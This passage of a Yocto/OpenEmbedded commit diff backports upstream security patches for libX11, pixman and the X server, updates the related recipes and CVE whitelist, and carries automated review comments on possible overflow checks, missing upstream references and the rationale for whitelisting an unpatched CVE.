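Review bot: `FirstExtensionRequest` is defined only inside `#ifndef LastExtensionRequest`, so a header that provides `LastExtensionRequest` alone would leave `FirstExtensionRequest` undefined at the two cookie setters. Giving it its own guard avoids that: `#ifndef FirstExtensionRequest`, `#define FirstExtensionRequest 128`, `#endif`. `LastExtensionError`, used in `XESetWireToError`, gets no fallback in this patch and has to come from an included header, which is worth confirming for the libX11 version this recipe builds. The function bodies continue outside the hunks.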
diff --git a/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43785.patch b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43785.patch
new file mode 100644
index 0000000000..dbdf096fc8
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43785.patch
@@ -0,0 +1,63 @@
+From 6858d468d9ca55fb4c5fd70b223dbc78a3358a7f Mon Sep 17 00:00:00 2001
+From: Alan Coopersmith <alan.coopersmith@oracle.com>
+Date: Sun, 17 Sep 2023 14:19:40 -0700
+Subject: [PATCH libX11 1/5] CVE-2023-43785: out-of-bounds memory access in
+ _XkbReadKeySyms()
+
+Make sure we allocate enough memory in the first place, and
+also handle error returns from _XkbReadBufferCopyKeySyms() when
+it detects out-of-bounds issues.
+
+Reported-by: Gregory James DUCK <gjduck@gmail.com>
+Signed-off-by: Alan Coopersmith <alan.coopersmith@oracle.com>
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/libx11/tree/debian/patches/0001-CVE-2023-43785-out-of-bounds-memory-access-in-_XkbRe.patch?h=ubuntu/focal-security
+Upstream commit https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/6858d468d9ca55fb4c5fd70b223dbc78a3358a7f]
+CVE: CVE-2023-43785
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/xkb/XKBGetMap.c | 14 +++++++++-----
+ 1 file changed, 9 insertions(+), 5 deletions(-)
+
+diff --git a/src/xkb/XKBGetMap.c b/src/xkb/XKBGetMap.c
+index 2891d21e..31199e4a 100644
+--- a/src/xkb/XKBGetMap.c
++++ b/src/xkb/XKBGetMap.c
+@@ -182,7 +182,8 @@ _XkbReadKeySyms(XkbReadBufferPtr buf, XkbDescPtr xkb, xkbGetMapReply *rep)
+ if (offset + newMap->nSyms >= map->size_syms) {
+ register int sz;
+
+- sz = map->size_syms + 128;
++ sz = offset + newMap->nSyms;
++ sz = ((sz + (unsigned) 128) / 128) * 128;
+ _XkbResizeArray(map->syms, map->size_syms, sz, KeySym);
+ if (map->syms == NULL) {
+ map->size_syms = 0;
+@@ -191,8 +192,9 @@ _XkbReadKeySyms(XkbReadBufferPtr buf, XkbDescPtr xkb, xkbGetMapReply *rep)
+ map->size_syms = sz;
+ }
+ if (newMap->nSyms > 0) {
+- _XkbReadBufferCopyKeySyms(buf, (KeySym *) &map->syms[offset],
+- newMap->nSyms);
++ if (_XkbReadBufferCopyKeySyms(buf, (KeySym *) &map->syms[offset],
++ newMap->nSyms) == 0)
++ return BadLength;
+ offset += newMap->nSyms;
+ }
+ else {
+@@ -222,8 +224,10 @@ _XkbReadKeySyms(XkbReadBufferPtr buf, XkbDescPtr xkb, xkbGetMapReply *rep)
+ newSyms = XkbResizeKeySyms(xkb, i + rep->firstKeySym, tmp);
+ if (newSyms == NULL)
+ return BadAlloc;
+- if (newMap->nSyms > 0)
+- _XkbReadBufferCopyKeySyms(buf, newSyms, newMap->nSyms);
++ if (newMap->nSyms > 0) {
++ if (_XkbReadBufferCopyKeySyms(buf, newSyms, newMap->nSyms) == 0)
++ return BadLength;
++ }
+ else
+ newSyms[0] = NoSymbol;
+ oldMap->kt_index[0] = newMap->ktIndex[0];
+--
+2.39.3
+
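Review bot: The new size computation in `_XkbReadKeySyms` would read more easily with a comment stating the invariant it establishes, for example `/* round up to a multiple of 128 that is strictly greater than offset + nSyms */`. `sz` is declared `int` while the rounding is done in unsigned arithmetic, and `offset + newMap->nSyms` is summed without an overflow check; whether `offset` can grow large enough to matter depends on loop bounds outside this hunk. The function starts and ends outside the hunk.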
diff --git a/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43786-1.patch b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43786-1.patch
new file mode 100644
index 0000000000..31a99eb4ac
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43786-1.patch
@@ -0,0 +1,42 @@
+From 204c3393c4c90a29ed6bef64e43849536e863a86 Mon Sep 17 00:00:00 2001
+From: Alan Coopersmith <alan.coopersmith@oracle.com>
+Date: Thu, 7 Sep 2023 15:54:30 -0700
+Subject: [PATCH libX11 2/5] CVE-2023-43786: stack exhaustion from infinite
+ recursion in PutSubImage()
+
+When splitting a single line of pixels into chunks to send to the
+X server, be sure to take into account the number of bits per pixel,
+so we don't just loop forever trying to send more pixels than fit in
+the given request size and not breaking them down into a small enough
+chunk to fix.
+
+Fixes: "almost complete rewrite" (Dec. 12, 1987) from X11R2
+Signed-off-by: Alan Coopersmith <alan.coopersmith@oracle.com>
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/libx11/tree/debian/patches/0002-CVE-2023-43786-stack-exhaustion-from-infinite-recurs.patch?h=ubuntu/focal-security
+Upstream commit https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/204c3393c4c90a29ed6bef64e43849536e863a86]
+CVE: CVE-2023-43786
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/PutImage.c | 5 +++--
+ 1 file changed, 3 insertions(+), 2 deletions(-)
+
+diff --git a/src/PutImage.c b/src/PutImage.c
+index 857ee916..a6db7b42 100644
+--- a/src/PutImage.c
++++ b/src/PutImage.c
+@@ -914,8 +914,9 @@ PutSubImage (
+ req_width, req_height - SubImageHeight,
+ dest_bits_per_pixel, dest_scanline_pad);
+ } else {
+- int SubImageWidth = (((Available << 3) / dest_scanline_pad)
+- * dest_scanline_pad) - left_pad;
++ int SubImageWidth = ((((Available << 3) / dest_scanline_pad)
++ * dest_scanline_pad) - left_pad)
++ / dest_bits_per_pixel;
+
+ PutSubImage(dpy, d, gc, image, req_xoffset, req_yoffset, x, y,
+ (unsigned int) SubImageWidth, 1,
+--
+2.39.3
+
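Review bot: The new `SubImageWidth` is not checked for being positive before the recursive `PutSubImage` call. If `Available` were ever small enough for the expression to yield 0, the split would make no progress and the recursion could again fail to terminate; `Available` and the follow-up call for the remaining width are outside this hunk, so this may be unreachable in practice. A guard that stops when `SubImageWidth <= 0`, or a comment stating why the value is always at least 1, would settle it. `dest_bits_per_pixel` is also used as a divisor without a visible zero check.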
diff --git a/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43786-2.patch b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43786-2.patch
new file mode 100644
index 0000000000..4800bedf41
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43786-2.patch
@@ -0,0 +1,46 @@
+From 73a37d5f2fcadd6540159b432a70d80f442ddf4a Mon Sep 17 00:00:00 2001
+From: Alan Coopersmith <alan.coopersmith@oracle.com>
+Date: Thu, 7 Sep 2023 15:55:04 -0700
+Subject: [PATCH libX11 3/5] XPutImage: clip images to maximum height & width
+ allowed by protocol
+
+The PutImage request specifies height & width of the image as CARD16
+(unsigned 16-bit integer), same as the maximum dimensions of an X11
+Drawable, which the image is being copied to.
+
+Signed-off-by: Alan Coopersmith <alan.coopersmith@oracle.com>
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/libx11/tree/debian/patches/0003-XPutImage-clip-images-to-maximum-height-width-allowe.patch?h=ubuntu/focal-security
+Upstream commit https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/73a37d5f2fcadd6540159b432a70d80f442ddf4a]
+CVE: CVE-2023-43786
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/PutImage.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/src/PutImage.c b/src/PutImage.c
+index a6db7b42..ba411e36 100644
+--- a/src/PutImage.c
++++ b/src/PutImage.c
+@@ -30,6 +30,7 @@ in this Software without prior written authorization from The Open Group.
+ #include "Xlibint.h"
+ #include "Xutil.h"
+ #include <stdio.h>
++#include <limits.h>
+ #include "Cr.h"
+ #include "ImUtil.h"
+ #include "reallocarray.h"
+@@ -962,6 +963,10 @@ XPutImage (
+ height = image->height - req_yoffset;
+ if ((width <= 0) || (height <= 0))
+ return 0;
++ if (width > USHRT_MAX)
++ width = USHRT_MAX;
++ if (height > USHRT_MAX)
++ height = USHRT_MAX;
+
+ if ((image->bits_per_pixel == 1) || (image->format != ZPixmap)) {
+ dest_bits_per_pixel = 1;
+--
+2.39.3
+
diff --git a/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43787-1.patch b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43787-1.patch
new file mode 100644
index 0000000000..d35d96c4dc
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43787-1.patch
@@ -0,0 +1,52 @@
+From b4031fc023816aca07fbd592ed97010b9b48784b Mon Sep 17 00:00:00 2001
+From: Alan Coopersmith <alan.coopersmith@oracle.com>
+Date: Thu, 7 Sep 2023 16:12:27 -0700
+Subject: [PATCH libX11 4/5] XCreatePixmap: trigger BadValue error for
+ out-of-range dimensions
+
+The CreatePixmap request specifies height & width of the image as CARD16
+(unsigned 16-bit integer), so if either is larger than that, set it to 0
+so the X server returns a BadValue error as the protocol requires.
+
+Signed-off-by: Alan Coopersmith <alan.coopersmith@oracle.com>
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/libx11/tree/debian/patches/0004-XCreatePixmap-trigger-BadValue-error-for-out-of-rang.patch?h=ubuntu/focal-security
+Upstream commit https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/b4031fc023816aca07fbd592ed97010b9b48784b]
+CVE: CVE-2023-43787
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/CrPixmap.c | 11 +++++++++++
+ 1 file changed, 11 insertions(+)
+
+diff --git a/src/CrPixmap.c b/src/CrPixmap.c
+index cdf31207..3cb2ca6d 100644
+--- a/src/CrPixmap.c
++++ b/src/CrPixmap.c
+@@ -28,6 +28,7 @@ in this Software without prior written authorization from The Open Group.
+ #include <config.h>
+ #endif
+ #include "Xlibint.h"
++#include <limits.h>
+
+ #ifdef USE_DYNAMIC_XCURSOR
+ void
+@@ -47,6 +48,16 @@ Pixmap XCreatePixmap (
+ Pixmap pid;
+ register xCreatePixmapReq *req;
+
++ /*
++ * Force a BadValue X Error if the requested dimensions are larger
++ * than the X11 protocol has room for, since that's how callers expect
++ * to get notified of errors.
++ */
++ if (width > USHRT_MAX)
++ width = 0;
++ if (height > USHRT_MAX)
++ height = 0;
++
+ LockDisplay(dpy);
+ GetReq(CreatePixmap, req);
+ req->drawable = d;
+--
+2.39.3
+
diff --git a/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43787-2.patch b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43787-2.patch
new file mode 100644
index 0000000000..110bd445df
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43787-2.patch
@@ -0,0 +1,64 @@
+From 7916869d16bdd115ac5be30a67c3749907aea6a0 Mon Sep 17 00:00:00 2001
+From: Yair Mizrahi <yairm@jfrog.com>
+Date: Thu, 7 Sep 2023 16:15:32 -0700
+Subject: [PATCH libX11 5/5] CVE-2023-43787: Integer overflow in XCreateImage()
+ leading to a heap overflow
+
+When the format is `Pixmap` it calculates the size of the image data as:
+ ROUNDUP((bits_per_pixel * width), image->bitmap_pad);
+There is no validation on the `width` of the image, and so this
+calculation exceeds the capacity of a 4-byte integer, causing an overflow.
+
+Signed-off-by: Alan Coopersmith <alan.coopersmith@oracle.com>
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/libx11/tree/debian/patches/0005-CVE-2023-43787-Integer-overflow-in-XCreateImage-lead.patch?h=ubuntu/focal-security
+Upstream commit https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/7916869d16bdd115ac5be30a67c3749907aea6a0]
+CVE: CVE-2023-43787
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/ImUtil.c | 20 +++++++++++++++-----
+ 1 file changed, 15 insertions(+), 5 deletions(-)
+
+diff --git a/src/ImUtil.c b/src/ImUtil.c
+index 36f08a03..fbfad33e 100644
+--- a/src/ImUtil.c
++++ b/src/ImUtil.c
+@@ -30,6 +30,7 @@ in this Software without prior written authorization from The Open Group.
+ #include <X11/Xlibint.h>
+ #include <X11/Xutil.h>
+ #include <stdio.h>
++#include <limits.h>
+ #include "ImUtil.h"
+
+ static int _XDestroyImage(XImage *);
+@@ -361,13 +362,22 @@ XImage *XCreateImage (
+ /*
+ * compute per line accelerator.
+ */
+- {
+- if (format == ZPixmap)
++ if (format == ZPixmap) {
++ if ((INT_MAX / bits_per_pixel) < width) {
++ Xfree(image);
++ return NULL;
++ }
++
+ min_bytes_per_line =
+- ROUNDUP((bits_per_pixel * width), image->bitmap_pad);
+- else
++ ROUNDUP((bits_per_pixel * width), image->bitmap_pad);
++ } else {
++ if ((INT_MAX - offset) < width) {
++ Xfree(image);
++ return NULL;
++ }
++
+ min_bytes_per_line =
+- ROUNDUP((width + offset), image->bitmap_pad);
++ ROUNDUP((width + offset), image->bitmap_pad);
+ }
+ if (image_bytes_per_line == 0) {
+ image->bytes_per_line = min_bytes_per_line;
+--
+2.39.3
+
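Review bot: The ZPixmap check bounds `bits_per_pixel * width` by `INT_MAX`, but `ROUNDUP` is then applied to that product; if the macro adds `pad - 1` before dividing (its definition is outside the hunk), a product just below the limit can still wrap. Leaving headroom for the pad, for example `if (((INT_MAX - image->bitmap_pad) / bits_per_pixel) < width)`, would close that gap, and the same reasoning applies to `(INT_MAX - offset) < width` in the else branch. The division also assumes `bits_per_pixel` is non-zero, which is established, if at all, earlier in `XCreateImage` outside this hunk.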
diff --git a/meta/recipes-graphics/xorg-lib/libx11_1.6.9.bb b/meta/recipes-graphics/xorg-lib/libx11_1.6.9.bb
index ebd2640743..248889a1d4 100644
--- a/meta/recipes-graphics/xorg-lib/libx11_1.6.9.bb
+++ b/meta/recipes-graphics/xorg-lib/libx11_1.6.9.bb
@@ -15,6 +15,15 @@ SRC_URI += "file://Fix-hanging-issue-in-_XReply.patch \
file://libx11-whitespace.patch \
file://CVE-2020-14344.patch \
file://CVE-2020-14363.patch \
+ file://CVE-2021-31535.patch \
+ file://CVE-2022-3554.patch \
+ file://CVE-2022-3555.patch \
+ file://CVE-2023-3138.patch \
+ file://CVE-2023-43785.patch \
+ file://CVE-2023-43786-1.patch \
+ file://CVE-2023-43786-2.patch \
+ file://CVE-2023-43787-1.patch \
+ file://CVE-2023-43787-2.patch \
"
SRC_URI[md5sum] = "55adbfb6d4370ecac5e70598c4e7eed2"
diff --git a/meta/recipes-graphics/xorg-lib/libxpm_3.5.13.bb b/meta/recipes-graphics/xorg-lib/libxpm_3.5.17.bb
index fda8e32d2c..4694f911be 100644
--- a/meta/recipes-graphics/xorg-lib/libxpm_3.5.13.bb
+++ b/meta/recipes-graphics/xorg-lib/libxpm_3.5.17.bb
@@ -11,17 +11,18 @@ an extension of the monochrome XBM bitmap specificied in the X \
protocol."
LICENSE = "MIT"
-LIC_FILES_CHKSUM = "file://COPYING;md5=51f4270b012ecd4ab1a164f5f4ed6cf7"
+LIC_FILES_CHKSUM = "file://COPYING;md5=903942ebc9d807dfb68540f40bae5aff"
DEPENDS += "libxext libsm libxt gettext-native"
PE = "1"
XORG_PN = "libXpm"
+XORG_EXT = "tar.xz"
+EXTRA_OECONF += "--disable-open-zfile"
PACKAGES =+ "sxpm cxpm"
FILES_cxpm = "${bindir}/cxpm"
FILES_sxpm = "${bindir}/sxpm"
-SRC_URI[md5sum] = "6f0ecf8d103d528cfc803aa475137afa"
-SRC_URI[sha256sum] = "9cd1da57588b6cb71450eff2273ef6b657537a9ac4d02d0014228845b935ac25"
+SRC_URI[sha256sum] = "64b31f81019e7d388c822b0b28af8d51c4622b83f1f0cb6fa3fc95e271226e43"
BBCLASSEXTEND = "native"
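Review bot: `EXTRA_OECONF += "--disable-open-zfile"` is added without a comment, and it changes what the library does at run time rather than only how it is built. A one-line comment above it, such as `# Do not let libXpm open compressed (.Z/.gz) files through external helpers`, would tell the next maintainer that the option is intentional. The exact effect should be confirmed against the configure help of libXpm 3.5.17 before wording the comment.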
diff --git a/meta/recipes-graphics/xorg-lib/libxshmfence_1.3.bb b/meta/recipes-graphics/xorg-lib/libxshmfence_1.3.bb
index cc45696530..38cab99bbe 100644
--- a/meta/recipes-graphics/xorg-lib/libxshmfence_1.3.bb
+++ b/meta/recipes-graphics/xorg-lib/libxshmfence_1.3.bb
@@ -6,7 +6,7 @@ using file descriptor passing."
require xorg-lib-common.inc
-LICENSE = "MIT-style"
+LICENSE = "HPND"
LIC_FILES_CHKSUM = "file://COPYING;md5=47e508ca280fde97906eacb77892c3ac"
DEPENDS += "virtual/libx11"
diff --git a/meta/recipes-graphics/xorg-lib/pixman/CVE-2022-44638.patch b/meta/recipes-graphics/xorg-lib/pixman/CVE-2022-44638.patch
new file mode 100644
index 0000000000..d54ae16b33
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/pixman/CVE-2022-44638.patch
@@ -0,0 +1,34 @@
+CVE: CVE-2022-44638
+Upstream-Status: Backport
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+Signed-off-by:Bhabu Bindu <bhabu.bindu@kpit.com>
+
+From a1f88e842e0216a5b4df1ab023caebe33c101395 Mon Sep 17 00:00:00 2001
+From: Matt Turner <mattst88@gmail.com>
+Date: Wed, 2 Nov 2022 12:07:32 -0400
+Subject: [PATCH] Avoid integer overflow leading to out-of-bounds write
+
+Thanks to Maddie Stone and Google's Project Zero for discovering this
+issue, providing a proof-of-concept, and a great analysis.
+
+Closes: https://gitlab.freedesktop.org/pixman/pixman/-/issues/63
+---
+ pixman/pixman-trap.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/pixman/pixman-trap.c b/pixman/pixman-trap.c
+index 91766fd..7560405 100644
+--- a/pixman/pixman-trap.c
++++ b/pixman/pixman-trap.c
+@@ -74,7 +74,7 @@ pixman_sample_floor_y (pixman_fixed_t y,
+
+ if (f < Y_FRAC_FIRST (n))
+ {
+- if (pixman_fixed_to_int (i) == 0x8000)
++ if (pixman_fixed_to_int (i) == 0xffff8000)
+ {
+ f = 0; /* saturate */
+ }
+--
+GitLab
+
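Review bot: `Upstream-Status: Backport` in this patch header gives no upstream reference, unlike the other backports added in this commit, and `Signed-off-by:Bhabu Bindu` is missing the space after the colon. The header already carries the upstream commit hash and the issue URL names the pixman GitLab project, so the tag could read `Upstream-Status: Backport [https://gitlab.freedesktop.org/pixman/pixman/-/commit/a1f88e842e0216a5b4df1ab023caebe33c101395]` (URL form assumed from the other patches here). That reference is what lets an auditor verify the one-line CVE fix against its source.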
diff --git a/meta/recipes-graphics/xorg-lib/pixman_0.38.4.bb b/meta/recipes-graphics/xorg-lib/pixman_0.38.4.bb
index 22e19ba069..5873c19bab 100644
--- a/meta/recipes-graphics/xorg-lib/pixman_0.38.4.bb
+++ b/meta/recipes-graphics/xorg-lib/pixman_0.38.4.bb
@@ -10,6 +10,7 @@ DEPENDS = "zlib"
SRC_URI = "https://www.cairographics.org/releases/${BP}.tar.gz \
file://0001-ARM-qemu-related-workarounds-in-cpu-features-detecti.patch \
file://0001-test-utils-Check-for-FE_INVALID-definition-before-us.patch \
+ file://CVE-2022-44638.patch \
"
SRC_URI[md5sum] = "267a7af290f93f643a1bc74490d9fdd1"
SRC_URI[sha256sum] = "da66d6fd6e40aee70f7bd02e4f8f76fc3f006ec879d346bae6a723025cfbdde7"
diff --git a/meta/recipes-graphics/xorg-lib/xorg-lib-common.inc b/meta/recipes-graphics/xorg-lib/xorg-lib-common.inc
index a566eaa45e..1e8525d874 100644
--- a/meta/recipes-graphics/xorg-lib/xorg-lib-common.inc
+++ b/meta/recipes-graphics/xorg-lib/xorg-lib-common.inc
@@ -6,8 +6,9 @@ LICENSE = "MIT-X"
DEPENDS = "util-macros"
XORG_PN = "${BPN}"
+XORG_EXT ?= "tar.bz2"
-SRC_URI = "${XORG_MIRROR}/individual/lib/${XORG_PN}-${PV}.tar.bz2"
+SRC_URI = "${XORG_MIRROR}/individual/lib/${XORG_PN}-${PV}.${XORG_EXT}"
S = "${WORKDIR}/${XORG_PN}-${PV}"
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg.inc b/meta/recipes-graphics/xorg-xserver/xserver-xorg.inc
index b4f0760176..ce57982a7d 100644
--- a/meta/recipes-graphics/xorg-xserver/xserver-xorg.inc
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg.inc
@@ -16,9 +16,17 @@ PE = "2"
INC_PR = "r8"
XORG_PN = "xorg-server"
-SRC_URI = "${XORG_MIRROR}/individual/xserver/${XORG_PN}-${PV}.tar.bz2"
-
-CVE_PRODUCT = "xorg-server"
+SRC_URI = "${XORG_MIRROR}/individual/xserver/${XORG_PN}-${PV}.tar.gz"
+
+CVE_PRODUCT = "xorg-server x_server"
+# This is specific to Debian's xserver-wrapper.c
+CVE_CHECK_WHITELIST += "CVE-2011-4613"
+# As per upstream, exploiting this flaw is non-trivial and it requires exact
+# timing on the behalf of the attacker. Many graphical applications exit if their
+# connection to the X server is lost, so a typical desktop session is either
+# impossible or difficult to exploit. There is currently no upstream patch
+# available for this flaw.
+CVE_CHECK_WHITELIST += "CVE-2020-25697"
S = "${WORKDIR}/${XORG_PN}-${PV}"
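Review bot: The `CVE_CHECK_WHITELIST += "CVE-2020-25697"` entry suppresses a flaw that its own comment describes as unpatched upstream, so the justification is "hard to exploit" rather than "not applicable", which is the case for CVE-2011-4613 above it. Once whitelisted, the CVE presumably drops out of the cve-check findings for images built from this layer and nothing prompts anyone to revisit it. The comment should state that the issue is still present and accepted, e.g. `# Still unfixed in this version; accepted risk, remove this entry once a fix exists.` Separately, `SRC_URI` hard-codes `.tar.gz` here while the same commit introduces `XORG_EXT` for the libraries, and the matching checksum change is not visible in this hunk.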
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14346.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14346.patch
deleted file mode 100644
index 4994a21d33..0000000000
--- a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14346.patch
+++ /dev/null
@@ -1,36 +0,0 @@
-From c940cc8b6c0a2983c1ec974f1b3f019795dd4cff Mon Sep 17 00:00:00 2001
-From: Matthieu Herrb <matthieu@herrb.eu>
-Date: Tue, 18 Aug 2020 14:49:04 +0200
-Subject: [PATCH] Fix XIChangeHierarchy() integer underflow
-
-CVE-2020-14346 / ZDI-CAN-11429
-
-This vulnerability was discovered by:
-Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
-
-Signed-off-by: Matthieu Herrb <matthieu@herrb.eu>
-
-Upstream-Status: Backport
-[https://gitlab.freedesktop.org/xorg/xserver/-/commit/c940cc8b6c0a2983c1ec974f1b3f019795dd4cff]
-CVE: CVE-2020-14346
-Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
----
- Xi/xichangehierarchy.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/Xi/xichangehierarchy.c b/Xi/xichangehierarchy.c
-index cbdd91258..504defe56 100644
---- a/Xi/xichangehierarchy.c
-+++ b/Xi/xichangehierarchy.c
-@@ -423,7 +423,7 @@ ProcXIChangeHierarchy(ClientPtr client)
- if (!stuff->num_changes)
- return rc;
-
-- len = ((size_t)stuff->length << 2) - sizeof(xXIChangeHierarchyReq);
-+ len = ((size_t)client->req_len << 2) - sizeof(xXIChangeHierarchyReq);
-
- any = (xXIAnyHierarchyChangeInfo *) &stuff[1];
- while (stuff->num_changes--) {
---
-2.17.1
-
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14347.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14347.patch
deleted file mode 100644
index cf3f5f9417..0000000000
--- a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14347.patch
+++ /dev/null
@@ -1,38 +0,0 @@
-From aac28e162e5108510065ad4c323affd6deffd816 Mon Sep 17 00:00:00 2001
-From: Matthieu Herrb <matthieu@herrb.eu>
-Date: Sat, 25 Jul 2020 19:33:50 +0200
-Subject: [PATCH] fix for ZDI-11426
-
-Avoid leaking un-initalized memory to clients by zeroing the
-whole pixmap on initial allocation.
-
-This vulnerability was discovered by:
-Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
-
-Signed-off-by: Matthieu Herrb <matthieu@herrb.eu>
-Reviewed-by: Alan Coopersmith <alan.coopersmith@oracle.com>
-
-
-Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/aac28e162e5108510065ad4c323affd6deffd816]
-CVE: CVE-2020-14347
-Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
----
- dix/pixmap.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/dix/pixmap.c b/dix/pixmap.c
-index 1186d7dbbf..5a0146bbb6 100644
---- a/dix/pixmap.c
-+++ b/dix/pixmap.c
-@@ -116,7 +116,7 @@ AllocatePixmap(ScreenPtr pScreen, int pixDataSize)
- if (pScreen->totalPixmapSize > ((size_t) - 1) - pixDataSize)
- return NullPixmap;
-
-- pPixmap = malloc(pScreen->totalPixmapSize + pixDataSize);
-+ pPixmap = calloc(1, pScreen->totalPixmapSize + pixDataSize);
- if (!pPixmap)
- return NullPixmap;
-
---
-GitLab
-
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14361.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14361.patch
deleted file mode 100644
index 710cc3873c..0000000000
--- a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14361.patch
+++ /dev/null
@@ -1,36 +0,0 @@
-From 144849ea27230962227e62a943b399e2ab304787 Mon Sep 17 00:00:00 2001
-From: Matthieu Herrb <matthieu@herrb.eu>
-Date: Tue, 18 Aug 2020 14:52:29 +0200
-Subject: [PATCH] Fix XkbSelectEvents() integer underflow
-
-CVE-2020-14361 ZDI-CAN 11573
-
-This vulnerability was discovered by:
-Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
-
-Signed-off-by: Matthieu Herrb <matthieu@herrb.eu>
-
-Upstream-Status: Backport
-[https://gitlab.freedesktop.org/xorg/xserver/-/commit/144849ea27230962227e62a943b399e2ab304787]
-CVE: CVE-2020-14361
-Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
----
- xkb/xkbSwap.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/xkb/xkbSwap.c b/xkb/xkbSwap.c
-index 1c1ed5ff4..50cabb90e 100644
---- a/xkb/xkbSwap.c
-+++ b/xkb/xkbSwap.c
-@@ -76,7 +76,7 @@ SProcXkbSelectEvents(ClientPtr client)
- register unsigned bit, ndx, maskLeft, dataLeft, size;
-
- from.c8 = (CARD8 *) &stuff[1];
-- dataLeft = (stuff->length * 4) - SIZEOF(xkbSelectEventsReq);
-+ dataLeft = (client->req_len * 4) - SIZEOF(xkbSelectEventsReq);
- maskLeft = (stuff->affectWhich & (~XkbMapNotifyMask));
- for (ndx = 0, bit = 1; (maskLeft != 0); ndx++, bit <<= 1) {
- if (((bit & maskLeft) == 0) || (ndx == XkbMapNotify))
---
-2.17.1
-
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14362.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14362.patch
deleted file mode 100644
index 2103e9c198..0000000000
--- a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14362.patch
+++ /dev/null
@@ -1,70 +0,0 @@
-From 2902b78535ecc6821cc027351818b28a5c7fdbdc Mon Sep 17 00:00:00 2001
-From: Matthieu Herrb <matthieu@herrb.eu>
-Date: Tue, 18 Aug 2020 14:55:01 +0200
-Subject: [PATCH] Fix XRecordRegisterClients() Integer underflow
-
-CVE-2020-14362 ZDI-CAN-11574
-
-This vulnerability was discovered by:
-Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
-
-Signed-off-by: Matthieu Herrb <matthieu@herrb.eu>
-
-Upstream-Status: Backport
-[https://gitlab.freedesktop.org/xorg/xserver/-/commit/2902b78535ecc6821cc027351818b28a5c7fdbdc]
-CVE: CVE-2020-14362
-Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
----
- record/record.c | 10 +++++-----
- 1 file changed, 5 insertions(+), 5 deletions(-)
-
-diff --git a/record/record.c b/record/record.c
-index f2d38c877..be154525d 100644
---- a/record/record.c
-+++ b/record/record.c
-@@ -2500,7 +2500,7 @@ SProcRecordQueryVersion(ClientPtr client)
- } /* SProcRecordQueryVersion */
-
- static int _X_COLD
--SwapCreateRegister(xRecordRegisterClientsReq * stuff)
-+SwapCreateRegister(ClientPtr client, xRecordRegisterClientsReq * stuff)
- {
- int i;
- XID *pClientID;
-@@ -2510,13 +2510,13 @@ SwapCreateRegister(xRecordRegisterClientsReq * stuff)
- swapl(&stuff->nRanges);
- pClientID = (XID *) &stuff[1];
- if (stuff->nClients >
-- stuff->length - bytes_to_int32(sz_xRecordRegisterClientsReq))
-+ client->req_len - bytes_to_int32(sz_xRecordRegisterClientsReq))
- return BadLength;
